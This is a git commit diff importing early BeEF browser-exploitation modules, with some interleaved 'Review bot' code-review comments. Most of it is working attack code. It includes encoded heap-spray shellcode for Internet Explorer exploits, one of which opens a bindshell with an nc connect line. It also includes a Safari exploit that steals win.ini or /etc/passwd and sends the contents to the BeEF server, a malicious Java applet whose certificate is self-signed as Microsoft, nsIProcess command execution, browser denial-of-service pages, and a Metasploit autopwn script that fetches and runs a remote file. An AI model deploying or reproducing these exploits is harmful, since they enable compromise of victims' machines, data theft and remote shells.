Initial Import

git-svn-id: https://beef.googlecode.com/svn/trunk@2 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
wade@bindshell.net
2010-01-11 00:54:08 +00:00
parent 11b1c899a5
commit 03ffb4703d
201 changed files with 18853 additions and 0 deletions


@@ -0,0 +1,62 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following is the boiler plate from the exploit
..::[ jamikazu presents ]::..
Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
Works on all Windows XP versions including SP2
Author: jamikazu
Mail: jamikazu@gmail.com
Bug discovered by Computer H D Moore (http://www.metasploit.com)
Credit: metasploit, SkyLined
invokes calc.exe if successful
-->
<script>
function get_b64_code_2006_3730() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('CVE-2006-3730', get_b64_code_2006_3730());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_2006_3730());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">CVE-2006-3730 (MS06-057)</div>
This module will launch calc.exe (Calculater) on Microsoft Windows. A vulnerability in
Microsoft Internet Explorer WebViewFolderIcon (setSlice) is exploited.<br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
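Review bot: Nothing in this page checks that the requester is a logged-in operator before it renders the controls and echoes the encoded template; the only include is `common.inc.php`, which the comment says is there for `get_b64_file()`. If that include does not itself enforce the console's authentication, this page and the other module pages in this commit that follow the same pattern can be fetched by anyone who can reach the web root, so I would add an explicit check at the top of the PHP block or a comment stating where it happens. The block also relies on the short `<?` open tag; where `short_open_tag` is off the PHP is sent to the browser as text, so `<?php` is the safer spelling.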


@@ -0,0 +1 @@
IE6 setSlice calc.exe (CVE-2006-3730)


@@ -0,0 +1,38 @@
var heapSprayToAddress = 0x05050505;
var payLoadCode = unescape(
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0505%u0505");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
for ( i = 0 ; i < 128 ; i++)
{
try{
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
}catch(e){}
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
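Review bot: The `payLoadCode` string is an opaque blob with no provenance in this file; the only statement of what it does is the "invokes calc.exe" line in the header copied into the companion page, which cannot be verified from here. I would add a header comment recording where the bytes were taken from, plus a checksum or a pointer to a disassembly, so the payload can be audited before it is used in an authorised test. The same applies to the `shellcode` string in the CVE-2009-0075 template and to `shellcode_sled` in the Chrome DoS template later in this commit.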


@@ -0,0 +1,80 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: http://www.milw0rm.com/exploits/8079
BeEF: the following is the boiler plate from the exploit
Internet Explorer 7 Uninitialized Memory Corruption Exploit
http://www.microsoft.com/technet/security/bulletin/MS09-002.mspx
Abyssec Inc Public Exploits 2009/2/18
this Exploit is based on N/A PoC in Milw0rm but The PoC was really simple to
exploit this PoC can be exploit on DEP-Enabled System As well using .Net
Shellcode trick or etc mayve i write Dep-Enabled version too And also
i should notice , this code can modify to be more reliable ..
Feel free to visit us at : www.Abyssec.com
to contact me directly use : admin@abyssec.com
Note : Tested and Worked On XP SP2 please wait for another version
// Skyland win32 bindshell (28876/tcp) shellcode
// If you want an evill Shellcode go ahead !!!
-->
<script>
function get_b64_code_2009_0075() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "REGEXP", document.cmd_form.regexp.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('CVE-2009-0075 (MS09-002)', get_b64_code_2009_0075());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_2009_0075());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">CVE-2009-0075 (MS09-002)</div>
Internet Explorer 7 Uninitialized Memory Corruption Exploit. This module targets
Windows XP SP2. Successful exploitation will start a bindshell listening on port
28879.<br><br>
The following command will connect to the listening bindshell:
<pre>
nc zombieip 28879
</pre>
<div id="module_subsection">
<form name="cmd_form">
<div id="module_subsection_header">UserAgent Regexp</div>
<input type="text" name="regexp" value="/.*Windows.*/"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
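Review bot: The listening port is stated two ways in this page: the copied exploit header says `28876/tcp`, while the module description and the `nc` example both say `28879`. The real value lives inside the encoded payload and cannot be checked from this page, so whoever confirms it should correct the text; the port is what a scope document and a defender's network detection would both key on. Separately, the `regexp` field is passed to `b64replace` unchanged and ends up as code in the template (`navigator.userAgent.match(REGEXP)`), which deserves a comment saying the field is trusted operator input and is not validated.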


@@ -0,0 +1 @@
XP SP2 IE Bindshell (CVE-2009-0075)


@@ -0,0 +1,35 @@
if(navigator.userAgent.match(REGEXP)) {
var shellcode=unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
var array = new Array();
//Don't need change but for execute time you can change ;)
var calc = 0x100000-(shellcode.length*2+0x01020);
// Spray or Not :-??
var point = unescape("%u0D0D%u0D0D");
while(point.length<calc) { point+=point;}
var sec = point.substring(0,calc/2);
delete point;
for(i=0; i<0xD0; i++) {
array[i] = sec + shellcode;
}
// N/A Code
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
}


@@ -0,0 +1,52 @@
<?
// Copyright (c) 2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following details refer to the source of this port
Billy (BK) Rios
Blog: Stealing More Files with Safari
http://xs-sniper.com/blog/2009/02/13/stealing-more-files-with-safari/
-->
<script>
function get_b64_code_2009_0137() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('CVE-2009-0137', get_b64_code_2009_0137());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_2009_0137());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">CVE-2009-0137</div>
This Safari exploit module will steal a file from the file system. On Windows
the 'c:\windows\win.ini' will be stolen and on a Mac the '/etc/passwd' will
be stolen.<br><br>
The results will be displayed in the log. <br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>


@@ -0,0 +1 @@
Safari File Theft (CVE-2009-0137)


@@ -0,0 +1,20 @@
<?
// Copyright (c) 2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php");
?>
beef_url = "<?= BEEF_DOMAIN; ?>";
// ---[ RETURN_RESULT
// send result to beef
function return_result(action, data) {
var img_tmp = new Image();
var src = beef_url + '/hook/return.php?BeEFSession=<? echo session_id(); ?>&action=' + action + '&data=' + escape(data);
img_tmp.src = src;
}
return_result(result_id, file_content);
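Review bot: The `var src = ...` line in `return_result` puts both the PHP session identifier and the whole `data` value into a GET query string, so every result returned through it, file contents included, is written to the web server's access log and to any proxy log on the path. A header comment should say so, and the deployment notes should treat those logs as engagement data with the same access and retention rules as the results store. `beef_url` is also assigned without `var`, which creates a global in whatever page loads this script.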


@@ -0,0 +1,11 @@
function do_main(){
var iframe = document.createElement('iframe');
// pass result_id in the url
iframe.src = beef_url + 'modules/symmetric/xplt_cve_2009_0137/xss-max.xml' + '#' + result_id;
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
}
do_main();


@@ -0,0 +1,66 @@
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
>
<channel>
<title>Local XSS</title>
<link>http://www.bindshell.net</link>
<description>BeEF Browser Exploitation Framework</description>
<item>
<title>BeEF module</title>
<content:encoded><![CDATA[
<body src="/beef/images/beef.gif" onload="javascript:;
var req;
var req_file;
if (/Windows/.test(navigator.userAgent)) {
req_file='file:///c:/windows/win.ini'
} else {
req_file='file:////etc/passwd'
};
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open('GET', req_file, true);
req.send('');
function processReqChange() {
if (req.readyState == 4) {
file_content = req.responseText;
result_id=document.location.hash.substr(1,document.cookie.length);
beef_url = 'http://' + document.location.host + '/beef/';
var html_doc = document.getElementsByTagName('head').item(0);
var js = document.createElement('script');
js.src = beef_url + 'modules/browser/xplt_cve_2009_0137/snatchxml.php';
js.type = 'text/javascript';
html_doc.appendChild(js);
}
}" <onload=""
]]>
</content:encoded>
</item>
<title>Local XSS</title>
<link>http://www.bindshell.net</link>
<description>none</description>
<item>
<title>RSS sploit</title>
<content:encoded><![CDATA[
]]>
</content:encoded>
</item>
</channel>
</rss>


@@ -0,0 +1,71 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: http://www.milw0rm.com/exploits/8573
BeEF: http://www.secniche.org/gthr.html
BeEF: the following is the boiler plate from the exploit
Advisory: Google Chrome 1.0.154.59 "throw exception" Memory Exhaustion Vulnerability.
Version Affected:
1.0.154.59 . Previous versions are vulnerable too
Description:
The Google chrome browser is vulnerable to memory exhaustion based denial of service which can be triggered remotely.The vulnerability is a result of arbitrary shell code which is rendered in a script tag with an exception that is raised directly with throw statement. It makes the browser to consume memory thereby impacting the focussed window and leads to crash. The impact can be stringent based on different systems.
Proof of Concept:
http://www.secniche.org/gthr
Detection:
SecNiche confirmed this vulnerability affects Google Chrome on Microsoft Windows XP SP2 platform.The versions tested are:1.0.154.59
Disclosure Timeline:
Release Date. April 28 ,2009
Credit:
Aditya K Sood
-->
<script>
function get_b64_code_cd() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Dos Chrome', get_b64_code_cd());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_cd());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">DoS Chrome "throw exception" Memory Exhaustion</div>
Google Chrome 1.0.154.53 "throw exception" Remote Crash and Denial of Service <br>
Executing NOP Sled and Shellcode to create an Exception.<br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
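Review bot: The affected version is given as `1.0.154.59` three times in the copied advisory but as `1.0.154.53` in the page text, so the description an operator reads disagrees with its own source. The page text also says the module is "Executing NOP Sled and Shellcode", while the advisory describes memory exhaustion and the template later in this commit only throws the concatenated string; the description should state the actual impact (a browser crash) so the module's risk is not misjudged. The autorun label `'Dos Chrome'` differs in case from the header and name file (`DoS Chrome`).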


@@ -0,0 +1 @@
DoS Chrome


@@ -0,0 +1,6 @@
var nop_sled=unescape("%u9090");
var shellcode_sled=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065");
for(var i=0;i<64;i++){
nop_sled=nop_sled+nop_sled;
document.write('<script>throw nop_sled+shellcode_sled;</scr'+'ipt>');
}


@@ -0,0 +1,7 @@
<html>
<body onLoad="document.forms[0].submit()">
<FORM>
<KEYGEN NAME="somekey" CHALLENGE="1125983021">
<INPUT TYPE="submit" NAME="SubmitButton" VALUE="Done">
</FORM>
</html>


@@ -0,0 +1,46 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: this exploit was downloaded from milworm
http://www.milw0rm.com/exploits/8822
-->
<script>
function get_b64_code_fd() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('DoS Firefox', get_b64_code_fd());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_fd());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">DoS Firefox (Keygen)</div>
This will DoS firefox and give very limited interaction. A dialog will be displayed repeatedly.<br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>


@@ -0,0 +1 @@
DoS Firefox (Keygen)


@@ -0,0 +1,12 @@
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = beef_url + 'modules/symmetric/xplt_firefox_dos/ffkeygendos.html';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Request Sent";
}
return_result(result_id, do_main());

File diff suppressed because one or more lines are too long


@@ -0,0 +1,43 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once ("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
var rtnval = "This shouldn't be returned'";
function get_b64_code_request() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('DoS Generic', get_b64_code_request());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_request());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">DoS Generic</div>
This will DoS many browsers. A large string will be repeatedly
written using the JavaScript function document.writeln(). <br><br>
<div id="module_subsection">
<form name="myform">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
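Review bot: The helper name `get_b64_code_request` is reused by the manual Metasploit autopwn page later in this commit, whereas the other module pages give this helper a module-specific suffix (`_2006_3730`, `_cd`, `_fd`). These pages appear to be fragments loaded into one console document; if so, the later definition silently replaces the earlier one and a button can send a different module's template than the one on screen. I would rename it here, e.g. `function get_b64_code_dos_generic() {`, and update the two callers. `rtnval` is assigned but not used in this page, and its string ends with a stray `'`.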


@@ -0,0 +1 @@
DoS Generic


@@ -0,0 +1,15 @@
// thanks pipes (mark@freedomisnothingtofear.com)
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = beef_url + 'modules/browser/generic_dos/browserdos.html';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Executing now";
}
return_result(result_id, do_main());

Binary file not shown.


@@ -0,0 +1,52 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// Module by: Joshua "Jabra" Abraham http://blog.spl0it.org
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_applet() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// do some super escaping
cmd_str = document.myform.cmd.value;
cmd_str = cmd_str.replace(/\\/g, '\\\\');
cmd_str = cmd_str.replace(/\\/g, '\\\\');
// replace sections of the code with user input
b64code = b64replace(b64code, "BEEFCMD_IE",cmd_str);
b64code = b64replace(b64code, "BEEFCMD",cmd_str);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Malicious Applet', get_b64_code_applet());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_applet());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Malicious Java Applet</div>
This module will execute a command on the client. The client will receive a Java Applet popup. <br><br>
The certificate is self-signed by the Microsoft Corporation.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Command</div>
<input type="text" name="cmd" value="c:\windows\system32\calc.exe"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>


@@ -0,0 +1 @@
Malicious Java Applet


@@ -0,0 +1,30 @@
// ie doesn't play nice with dynamic loading of jars - below is a link to what sun recommends
// if any knows a nicer way to do this drop me an email
// http://java.sun.com/javase/6/docs/technotes/guides/plugin/developer_guide/using_tags.html#javascript
function applet() {
var _app = navigator.appName;
if (_app == 'Microsoft Internet Explorer') {
var malicious = document.createElement("div");
malicious.innerHTML = '<OBJECT classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0"> <PARAM name="codebase" value="../modules/standard/malicious_applet"> <PARAM name="code" value="Update">> <PARAM name="archive" value="SignedUpdate.jar">> <PARAM name="cmd" value="BEEFCMD_IE"> </OBJECT>';
document.body.appendChild(malicious);
} else {
document.write(
'<embed ',
'code="Update"',
'codebase="../modules/browser/malicious_applet/"',
'archive="SignedUpdate.jar"',
'cmd="BEEFCMD"',
'width="0"',
'height="0"',
'type="application/x-java-applet;version=1.6" />');
}
return_result(result_id, "Appet running");
}
applet();


@@ -0,0 +1,53 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
get_b64_code_alert = function () {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "BEEFCOMMAND", document.myform.command_str.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Mozilla nsIProcess Interface', get_b64_code_alert());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_alert());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Mozilla nsIProcess XPCOM Interface (Windows)</div>
The nsIProcess XPCOM interface represents an executable process. JavaScript
code with chrome privileges can use the nsIProcess interface to launch
executable files. In this module, nsIProcess is combined with the Windows
command prompt cmd.exe.
<br><br>
Any XSS injection in a chrome privileged zone (e.g. typically in Firefox
extensions) allows his module to execute arbitrary commands on the victim
machine.
<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Windows Command</div>
<input type="text" width="90%" name="command_str" value="ping localhost"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>


@@ -0,0 +1 @@
Mozilla nsIProcess Interface


@@ -0,0 +1,17 @@
// thanks Roberto (roberto.suggi@security-assessment.com) and Nick (nick.freeman@security-assessment.com)
function do_main(){
var getWorkingDir= Components.classes["@mozilla.org/file/directory_service;1"].getService(Components.interfaces.nsIProperties).get("Home",Components.interfaces.nsIFile);
var lFile = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
var lPath = "C:\\WINDOWS\\system32\\cmd.exe";
lFile.initWithPath(lPath);
var process = Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
process.init(lFile);
process.run(false,['/c', 'BEEFCOMMAND'],2);
}
do_main();
return_result(result_id, "command executed");


@@ -0,0 +1,61 @@
<?
// Copyright (c) 2009, Ryan Linn (sussurro@happypacket.net)
// All Rights Reserved
// Template for code by:
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following is the boiler plate from the exploit
-->
<script language="javascript" type="text/javascript">
var rtnval = "OK Clicked";
Element.Methods.construct_code = function($url) {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
b64code = b64replace(b64code, "URL",$url);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Metasploit Browser Autopwn</div>
This module creates a Metasploit listener using a backend server, and then sends the client
code which creates an iframe connecting to the waiting exploit.<br><br>
Setup MSF to allow BeEF access (settings in /beef/ui/msf.php):<br>
<pre>
sudo ./msfconsole
msf > load xmlrpc Pass=BeEFMSFPass
</pre>
<div id="module_subsection">
<form name="myform" id="myform">
<div id="module_subsection_header">LHOST (Required)</div>
<input type="text" name="LHOST" value="0.0.0.0"/>
<div id="module_subsection_header">LPORT</div>
<input type="text" name="LPORT" value="4444"/>
<div id="module_subsection_header">SRVHOST (Required)</div>
<input type="text" name="SRVHOST" value="0.0.0.0"/>
<div id="module_subsection_header">SRVPORT (Required)</div>
<input type="text" name="SRVPORT" value="8080"/>
<div id="module_subsection_header">URIPATH</div>
<input type="text" name="URIPATH" value="beef"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:msf_browser_autopwn()"/>
</form>
</div>
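Review bot: The setup text tells the operator to load the XML-RPC plugin with the fixed password `BeEFMSFPass` from a `sudo` msfconsole, so every install that follows these instructions exposes the same credential on an interface that can launch modules, and does so as root. The text should tell operators to choose their own value and set the matching one in `/beef/ui/msf.php`, and should say whether root is actually required. The same instruction block is repeated in the Metasploit Browser Exploits and SMB Challenge Theft pages in this commit. The `0.0.0.0` default for `SRVHOST` listens on every interface of the tester's machine; a note recommending a specific address would be safer.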


@@ -0,0 +1 @@
MSF Browser Autopwn


@@ -0,0 +1,14 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'URL';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Launched Browser AutoPWN";
}
return_result(result_id, do_main());


@@ -0,0 +1,9 @@
use auxiliary/server/browser_autopwn
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 53
set SRVPORT 9000
set URIPATH /beef.html
sh -c 'cd /tmp; wget http://spl0it.org/files/msfautopwn.rb'
set AutoRunScript /tmp/msfautopwn.rb
run
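Review bot: The `sh -c` line fetches `msfautopwn.rb` over plain HTTP from a third-party host into `/tmp`, and the next line registers that file as the `AutoRunScript`, with no checksum and no pinned copy. The module page in this commit tells operators to start this file with `sudo ./msfconsole -r beef.rc`, so whatever that URL serves at the time, or whatever is substituted in transit, runs as root on the tester's machine. Because the path under `/tmp` is predictable and shared, a file already present there may be used instead of the download. I would vendor the script into the repository next to `beef.rc` and reference it from a directory the operator owns; at minimum, fetch it over HTTPS into a private directory and verify a recorded hash before `set AutoRunScript`.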


@@ -0,0 +1,59 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
//
// Module by: Joshua "Jabra" Abraham
// jabra@spl0it.org
// http://blog.spl0it.org
//
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
var rtnval = "Request Received";
function get_b64_code_request() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "MSF_IP",document.myform.msf_ip.value);
b64code = b64replace(b64code, "MSF_PORT",document.myform.msf_port.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Mozilla nsIProcess Interface', get_b64_code_request());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_request());
}
// add construct code to DOM
Element.addMethods();
</script>
<div id="module_header">Metasploit Browser Autopwn (Manual Setup)</div>
<div class="entry">
This exploit requires an RC file for Metasploit. Unlike the other Metasploit modules,
this one requires the manual setup of the autopwn module.<br><br>
Metasploit Autopwn RC File:<a href="../modules/browser/msf_autopwn/beef.rc"> beef.rc </a><br>
<pre>
sudo ./msfconsole -r beef.rc
</pre>
</div>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Metasploit Autopwn IP</div>
<input type="text" name="msf_ip" value="10.0.0.100"/>
<div id="module_subsection_header">Metasploit Autopwn Port</div>
<input type="text" name="msf_port" value="9000"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/><br>
</form>
</div>
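Review bot: The autorun label passed to `ar.enable` is `'Mozilla nsIProcess Interface'`, which looks copied from the nsIProcess module; this page is the manual Metasploit autopwn module, so an operator reviewing active autoruns would see the wrong name against it. I would change it to `ar.enable('MSF Browser Autopwn (M)', get_b64_code_request());` to match the module's name file. The Metasploit Payload Java Applet page at the end of this commit carries the same label. The `msf_ip` and `msf_port` values are also substituted into the template URL with no format check, so a typo silently produces an iframe pointing at an unintended, possibly out-of-scope, host.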


@@ -0,0 +1 @@
MSF Browser Autopwn (M)


@@ -0,0 +1,17 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'http://MSF_IP:MSF_PORT/beef.html';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Request Sent";
}
var result_value = do_main();
return_result(result_id, result_value);


@@ -0,0 +1,68 @@
<?
